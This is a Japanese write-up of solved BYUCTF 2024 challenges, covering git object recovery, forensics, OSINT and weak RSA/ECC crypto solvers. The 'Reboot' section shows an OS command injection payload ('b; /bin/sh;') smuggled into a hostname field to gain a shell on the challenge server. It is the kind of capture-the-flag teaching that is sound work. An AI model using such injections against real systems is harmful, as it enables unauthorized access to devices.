この大会は2024/5/17 9:00(JST)~2024/5/19 9:00(JST)に開催されました。
今回もチームで参戦。結果は1564点で1230チーム中205位でした。
自分で解けた問題をWriteupとして書いておきます。
Sanity Check (Misc)
ルールのページの最下部にフラグがあった。
byuctf{th4nks_f0r_r34d1ng_d4_rul3s}
Gitting Started (Misc)
$ git clone https://gitlab.com/TheITFirefly/tech-blog Cloning into 'tech-blog'... warning: redirecting to https://gitlab.com/TheITFirefly/tech-blog.git/ remote: Enumerating objects: 54, done. remote: Counting objects: 100% (54/54), done. remote: Compressing objects: 100% (36/36), done. remote: Total 54 (delta 13), reused 0 (delta 0), pack-reused 0 (from 0) Receiving objects: 100% (54/54), 22.47 KiB | 1.18 MiB/s, done. Resolving deltas: 100% (13/13), done. $ git init newrepo hint: Using 'master' as the name for the initial branch. This default branch name hint: is subject to change. To configure the initial branch name to use in all hint: of your new repositories, which will suppress this warning, call: hint: hint: git config --global init.defaultBranch <name> hint: hint: Names commonly chosen instead of 'master' are 'main', 'trunk' and hint: 'development'. The just-created branch can be renamed via this command: hint: hint: git branch -m <name> Initialized empty Git repository in /XXX/XXX/newrepo/.git/ $ cd newrepo/.git $ git unpack-objects < ../../tech-blog/.git/objects/pack/pack-3ff894f22f9b30e1dd3bc9351947d234c0554913.pack Unpacking objects: 100% (54/54), 22.45 KiB | 2.49 MiB/s, done.
スクリプトで順にオブジェクトを見ていき、フラグが含まれているものを探す。
#!/usr/bin/env python3 import os import zlib dirs = os.listdir('objects') found = False for dir in dirs: dir_name = 'objects/' + dir files = os.listdir(dir_name) for file in files: file_name = dir_name + '/' + file data = zlib.decompress(open(file_name, 'rb').read()) if b'byuctf{' in data: found = True print(data.decode()) break if found: break
実行結果は以下の通り。
blob 272+++
title = 'My First Post'
date = 2024-04-22T23:50:55-06:00
draft = false
+++
## Introduction
This is **bold** text, and this is *emphasized* text.
Fun fact, git has some weirdness in how it stores commits. byuctf{g1t_gud!}
Visit the [Hugo](https://gohugo.io) website!
byuctf{g1t_gud!}
Reboot (IoT)
OSコマンドインジェクションができる。
flag.txtはどこにあるかは不明。
hostnameに設定できるのは30バイトまで。
身動きしやすいように/bin/shでインジェクションする。
nc reboot.chal.cyberjousting.com 1358 === MENU === 1. Set hostname 2. Reboot Choice: 1 Enter new hostname (30 chars max): b; /bin/sh; === MENU === 1. Set hostname 2. Reboot Choice: 2 Rebooting... ::1 localhost ip6-localhost ip6-loopback 172.18.0.2 6bdbe4a55e2f id uid=1000(ctf) gid=1000(ctf) groups=1000(ctf) python3 -c 'import pty; pty.spawn("/bin/bash")' bash: /root/.bashrc: Permission denied ctf@6bdbe4a55e2f:/ctf$ ls ls clean.sh server.py start.sh xinetd.sh ctf@6bdbe4a55e2f:/ctf$ cd / cd / ctf@6bdbe4a55e2f:/$ ls ls bin ctf etc lib media ohno proc run srv tmp var boot dev home lib64 mnt opt root sbin sys usr ctf@6bdbe4a55e2f:/$ cd ohno cd ohno ctf@6bdbe4a55e2f:/ohno$ ls ls i ctf@6bdbe4a55e2f:/ohno$ cd i cd i ctf@6bdbe4a55e2f:/ohno/i$ ls ls hope ctf@6bdbe4a55e2f:/ohno/i$ cd hope cd hope ctf@6bdbe4a55e2f:/ohno/i/hope$ ls ls this ctf@6bdbe4a55e2f:/ohno/i/hope$ cd this cd this ctf@6bdbe4a55e2f:/ohno/i/hope/this$ ls ls isnt ctf@6bdbe4a55e2f:/ohno/i/hope/this$ cd isnt cd isnt ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt$ ls ls too ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt$ cd too cd too ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too$ ls ls long ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too$ cd long cd long ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long$ ls ls is ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long$ cd is cd is ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is$ ls ls this ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is$ cd this cd this ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this$ ls ls messing ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this$ cd messing cd messing ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing$ ls ls you ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing$ cd you cd you ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you$ ls ls up ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you$ cd up cd up ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up$ ls ls lol ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up$ cd lol <e/this/isnt/too/long/is/this/messing/you/up$ cd lol ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up/lol$ ls <e/this/isnt/too/long/is/this/messing/you/up/lol$ ls arent ctf@6bdbe4a55e2f:/ohno/i/hope/this/isnt/too/long/is/this/messing/you/up/lol$ cd arent </isnt/too/long/is/this/messing/you/up/lol$ cd arent <is/isnt/too/long/is/this/messing/you/up/lol/arent$ ls ls ctfs <is/isnt/too/long/is/this/messing/you/up/lol/arent$ cd ctfs cd ctfs <nt/too/long/is/this/messing/you/up/lol/arent/ctfs$ ls ls so <nt/too/long/is/this/messing/you/up/lol/arent/ctfs$ cd so cd so <too/long/is/this/messing/you/up/lol/arent/ctfs/so$ ls ls much <too/long/is/this/messing/you/up/lol/arent/ctfs/so$ cd much cd much <ong/is/this/messing/you/up/lol/arent/ctfs/so/much$ ls ls fun <ong/is/this/messing/you/up/lol/arent/ctfs/so/much$ cd fun cd fun <is/this/messing/you/up/lol/arent/ctfs/so/much/fun$ ls ls f19eaee3a4e2b88563b31c7c17e2ab33 <is/this/messing/you/up/lol/arent/ctfs/so/much/fun$ cat f19eaee3a4e2b88563b31c7c17e2ab33 <s/so/much/fun$ cat f19eaee3a4e2b88563b31c7c17e2ab33 byuctf{expl0iting_th1s_r3al_w0rld_w4s_s000_ann0ying}
byuctf{expl0iting_th1s_r3al_w0rld_w4s_s000_ann0ying}
Mail Time (OSINT)
「POST OFFICE STANLEY crown」で画像検索する。画像の上の方の窓を含めて、怪しいのは以下のページ。
https://www.alamy.com/stock-photo-great-britain-the-falkland-islands-port-stanley-house-facade-sign-123024275.html?imageid=84BA7368-9C8D-4936-8BFA-E7A0BF7274FD&p=75528&pn=1&searchId=0ce7f9e5cede420d5123c50c8c6c2a63&searchtype=0
Google mapで該当する「Falklands Post Service Ltd」のアドレスを見てみる。
845P+98W, Ross Rd, Stanley FIQQ 1ZZ, Falkland Islands (Islas Malvinas)
byuctf{845P+98W, Ross Rd, Stanley FIQQ 1ZZ, Falkland Islands (Islas Malvinas)}
Who Am I (Forensics)
ファイルプロパティを見ると、作成者は以下のようになっている。
Ryan Sketchy
byuctf{Ryan Sketchy}
Advanced Steak (Forensics)
Mad Cow.001に.cowの形式になっているデータが含まれていると推測できる。この形式は2つの.cowから開始と終了が以下のようになっていると思われる。
開始:"\x13\x37\xbe\xef" 終了:"Mooo"
このことを前提にMad Cow.001から.cowのデータを抽出し、flag.cowとして保存する。
#!/usr/bin/env python3 with open('Mad Cow.001', 'rb') as f: data = f.read() start = data.index(b'\x13\x37\xbe\xef') end = data.index(b'Mooo') + 4 with open('flag.cow', 'wb') as f: f.write(data[start:end])
このファイルからcow_decryptor.pyでpngに変換する。
$ python3 cow_decryptor.py -i flag.cow -o flag.png
変換したpngファイルの画像にフラグが書いてあった。
byuctf{incredi-bull}
The Worst Challenge Ever (Forensics)
"\x01"を終端とする"\x00"のデータの長さをASCIIコードとしてデコードする。
#!/usr/bin/env python3 with open('justterrible.txt', 'rb') as f: data = f.read() data0 = b'' flag = '' for d in data: if d == 0: data0 += bytes([d]) elif d == 1: flag += chr(len(data0)) data0 = b'' print(flag)
byuctf{wh4ts_4_nu11_byt3_4nyw4ys}
Are S A? (Crypto)
nは素数なので、簡単に復号できる。
#!/usr/bin/env python3 from Crypto.Util.number import * with open('cne.txt', 'r') as f: params = f.read().splitlines() n = int(params[0].split(' ')[-1]) e = int(params[1].split(' ')[-1]) c = int(params[2].split(' ')[-1]) assert isPrime(n) phi = n - 1 d = inverse(e, phi) m = pow(c, d, n) flag = long_to_bytes(m).decode() print(flag)
byuctf{d1d_s0m3_rs4_stuff...m1ght_d3l3t3_l4t3r}
Do Math! (Crypto)
p * getPrime(1024) % n はpで割り切れる。qも同様。hintではnはn-1になるので、nがわかる。nとp * getPrime(1024) % nのGCDを求めれば、pがわかる。あとは通常通り復号する。
#!/usr/bin/env python3 from Crypto.Util.number import * with open('hints.txt', 'r') as f: params = f.read().splitlines() c = int(params[0]) hints = eval(params[3]) e = 0x10001 n = hints[3] + 1 p = GCD(hints[0], n) q = GCD(hints[1], n) assert n == p * q phi = (p - 1) * (q - 1) d = pow(e, -1, phi) m = pow(c, d, n) flag = long_to_bytes(m).decode() print(flag)
byuctf{th3_g00d_m4th_1snt_th4t_h4rd}
Times (Crypto)
ECCで乗算ができれば、AES暗号の鍵を算出できる。あとはその鍵と既知のIVを使って復号する。
#!/usr/bin/env sage import hashlib from Crypto.Cipher import AES from Crypto.Util.Padding import unpad from base64 import b64decode p = 335135809459196851603485825030548860907 a = 13 b = 245 G = (14592775108451646097, 237729200841118959448447480561827799984) ciphertext = b'SllGMo5gxalFG9g8j4KO0cIbXeub0CM2VAWzXo3nbIxMqy1Hl4f+dGwhM9sm793NikYA0EjxvFyRMcU2tKj54Q==' iv = b'MWkMvRmhFy2vAO9Be9Depw==' ciphertext = b64decode(ciphertext) iv = b64decode(iv) F = FiniteField(p) E = EllipticCurve(F, [a, b]) start_point = E.point(G) new_point = start_point * 1337 shared_secret = new_point[0] sha1 = hashlib.sha1() sha1.update(str(shared_secret).encode('ascii')) key = sha1.digest()[:16] cipher = AES.new(key, AES.MODE_CBC, iv) flag = unpad(cipher.decrypt(ciphertext), AES.block_size).decode() print(flag)
byuctf{mult1pl1c4t10n_just_g0t_s0_much_m0r3_c0mpl1c4t3d}
Survey (Misc)
アンケートに答えたら、フラグが表示された。
byuctf{6ngcy2hybj}
